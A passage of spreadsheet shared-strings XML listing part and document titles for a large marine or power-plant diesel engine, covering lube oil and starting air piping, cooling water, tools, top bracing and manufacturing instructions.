    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL OUT.TURBOCHARGER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPES-UPPER GALLERY-REAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL PIPE TO TEE-PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEE PIECE-TURBOCHARGER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPE-LUB.OIL TURBOCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB OIL PIPE-FLUSHING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>L.O.PIPE FROM TEE-PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THREEWAY COCK WITH HANDLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONNECTIONS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CENTRALISED LUBRICATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL PIPE-AIR DISTRIB.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. LUB.OIL COMPONENTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLUSHING PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOSE CONNECTIONS PUMPUNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPES + HOSE TO PUMP UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIAGR.ARR.-LUB.OIL PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEALING OIL INLET PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEALING OIL OUTLET PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACKET FOR LUB.O. FILTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF PRE. LUB. PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB. OIL FILTER-MOUNTING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VAR.PIPES-BEDPL+FRAME BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISTR. PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN PIPE FROM T.C.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT. OF LUB. OIL PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1/2" RESTRICTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OUTLET  LUBE OIL PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>H.T. SEALING OIL DIAGRAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INLET LUB. OIL PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRANCH FOR LUB. OIL PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF LUB. OIL THERMOSTAT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB. OIL SEPARATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF PRE. LUBE PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF CENTRIFUGAL FILTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.O. OUTL. GEN. BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF LUB. OIL PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF SEALING OIL PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEALING OIL DIST. PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEALING OIL COLL. PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPE-STARTING AIR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE FOR PUNCTURE VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VARIOUS PIPES-CYL.COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INLET PIPE-STARTING AIR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR.OF MAIN START.VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COMPENSATOR-STARTING AIR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BURSTING CAP,COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPES-ST.AIR DISTRIBUTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXH. VALVE PUNCTURE PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>START.AIR PIPE-DISTRIB.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT-SEALING AIR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTR.AIR PIPE-FUEL PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEALING AIR INVA BLOCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NIPPLE WITH ORIFICE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLEANING PIPES-T.C.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THREE-WAY VALVES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTROL AIR PIPE BY-PASS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTR.AIR PIPE PUNC.VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ST.AIR PIPE-DISTRIBUTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRY CLEANING PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE FOR AIR CYLINDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEALING AIR TC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESSURE EQUALIZING PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPE VENTILATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. SEAL/CONTR.OIL PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPE SEAL/CONTR.OIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Repair kit, Main starting valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STARTING AIR DISTR. PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF JET SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF STARTING AIR PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARRANGEMENT OF ICS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF REMOTE START</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRESHW.PIPE OUT.CYL.COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRESHWATER PIPE-INLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPE-FRESHWATER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPES,UPPER EXH.SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPE-FRESH COOL.WAT.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE BENDS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRESHW. PIPES OUTLET ASSY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN PIPE,FRESHWATER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT-FRESHW. MOVABLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOL.W.PIPE-CYL.FRAME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPE-COOLING WATER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOL.W.PIPE-CYL.COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEE PIECE-COOLING WATER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE F.CONNECT.OF VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PARTS LIST-VENTING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN PIPE AUX. BLOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN FUNNEL-FRESH WATER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLEANING OF AIR COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLEANING PIPE-TC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STEAM PIPE FOR CLEANING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN PIPE-AC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN FUNNEL-AC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lamella - Assembly</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lamella - Frame</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN PIPE-SALT WATER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLING W.SYSTEM, FRESHW.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOWER COOL. WATER SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DE-AERATING TNK.ALARM DEV</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DE-AERATING TANK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>JACKET COOL. WATER SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STEAM HEATING SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOL.W. PIPE LUB.O.COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>L.T. INLET LUB. OIL COOL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>F.W. OUTLET COLL. PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>L.T. INLET CH. AIR COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>H.T. PIPE FOR PREHEATER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>H.T. INLET LUB. O. COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>H.T. OUTLET LUB.O. COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>H.T. OUTLET 3 WAY VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>H.T. INLET THERM. VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>H.T. OUTLET COLLECT. PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>H.T. INLET 3-WAY VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Control oil drain pipes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GAS PIPE ARR.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>UNDER PINNING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLEXIBLE TUBE DETAILS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASS. OF FLOW CHECK VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engine room,placement of tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ACCESSORIES-HYDR.TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOOK WRENCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLIERS FOR RETAINING RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TORQUE WRENCHES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BOX AND CROWFOOT WRENCHES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DOUBLE OPEN ENDED WRENCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RING WRENCHES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RING IMPACT WRENCHES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDR.JACK-HOLD.DOWN BOLTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDR.JACK END CHOCK BOLT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDR.JACK TOP BRACING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR.PIN GAUGE COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT.TOOL,CON.ROD COMPL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT.TOOL, CHAINWH.FRAME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT.-TOP SECTION COMPL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING OF SECTIONS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING REMAINING PARTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT.-CRANKSHAFT COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESSURE TEST PROCEDURE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEST TOOL,BLOW OFF VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADAPTOR F. BLOWOFF VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADAPTOR F. SHUTDOWN VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>JACK F. VOC BLOCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT FOR VOC BLOCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEST TOOL, SHUTDOWN VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOL FOR CYLINDER UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING TOOL, CHARG. AIR COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOL FOR THERMOSTAT HOUSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPARE PARTS AND TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOL F. M. OF SEAL. RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PULL LIFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOL LOCKER COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BORRING CUTTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OPERAT.MAINT.COMP.INSTRUC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CROSSHEAD+CONN.ROD,TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SAFETY EQUIMPENT,TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSY OF LARGE PARTS,TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOLS FOR MS-926</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE FOR GRINDING TABLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRINDING TABLE COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRINDING TABLE MOUNTED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACKET-MOUNTING TOOL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THRUST PIECE-MOUNT. TOOL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOLS ON PANEL MS 903</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOLS ON PANEL MS 907</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOLS ON PANEL MS 911</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PANEL FOR TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL OUTLET,ASSEMBLY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARRANGEMENT-FUEL OIL UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARRANGEMENT-CAMSHAFT UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lub. oil booster unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. DRAIN TANK UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTROL OIL PUMP UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE ASSEMBLING PARTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF SUPPORT. STRUCTURE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE FOR INLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE-INLET PREHEATER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE-OUTLET PREHEATER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE-INLET COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE-OUTLET COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE-INLET VISCOTHERM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE-OUTLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE ASSEMBLY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDRAULIC FILTER UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LINKS FOR TOP BRACING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FITT.BOLT F.TOP BRACING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PREPARATIONS F.MECH.TOPBR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOP BRACING OUTLINE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDR.TOP BRACING SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDR.TOP BRACING ARR.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORTING BRACKET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PREPARATIONS F.HYDR.TOPBR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROT. COMPENSATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIN. COMPENSATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flyweight assembly</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bearing flange</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hydraulic control unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDRAULIC TOP DAMPER ARR.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDR.TOP DAMPER SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Compensator housing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Compensator housing, mashined</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Compensator housing, welded</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Panel tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF EPOXY CHOCKS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSY OF HOLDING DOWN BOLT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLACING OF MEASURING PINS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSY OF END CHOCK BOLT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSEMBLY OF END CHOCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLASS SPARE PARTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REPLACED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PS FOR BEDPLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PS FOR FRAME BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PS FOR CRANKSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Power plant installation</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MARINE PLANT INSTALLATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Production documents</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Specific engine type</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC BEARING CLEAR. MC-S</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QS HEAT INS.&amp;NOISE ABATEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CASTING INSTRUCT.IRON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CASTING INSTRUCT. STEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON SKIRT.W.MO.COATING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REPAIR OF CAST STEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REP.CON.ROD FORGED STEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GEN.INSPECT.OF PLATES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELDING INSTR. CRANKSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELDING INSTRUCT.BEDPLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELDING INSTRUCT. FRAME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELDING INST.F.STAY BOLT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR Asembly &amp; Test of ACC. block</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELD.INSTR.F.COOLING SYST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QS HYDR.EXH.ACTUATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEAT-TREATMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIM. GUIDANCE F.MACHINING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MI FOR BEDPLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MI F.CHAIN DRIVE UPP.PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MI FOR CYLINDER COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MI FOR CRANKSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MI FOR CONNECTING ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MI FOR CROSSHEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MI FOR FUEL VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MI FOR STAYBOLT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MI FOR FUEL PUMP GEAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MI FOR FUEL PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MI FOR TURNING WHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VARIOUS INSTRUCTIONS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEDPLATE CHECK + MARKING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAMEBOXCHECK + MARKING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHAINFRAME CHECK+MARKING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MARKING INSTRUCTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MARKING, LIFTING TOOL SWL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC SCAVENGE AIR RECEIVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCAVAIR REC.CHECK+MARKING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST REC.CHECK+MARKING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CH. AIR COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SA FOR CAMSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SA FOR CHAIN DRIVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUB-ASSEMBLING, REG. 33</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC WELD.CODE+ABBREVIATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SA FOR MOMENT COMPENSATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
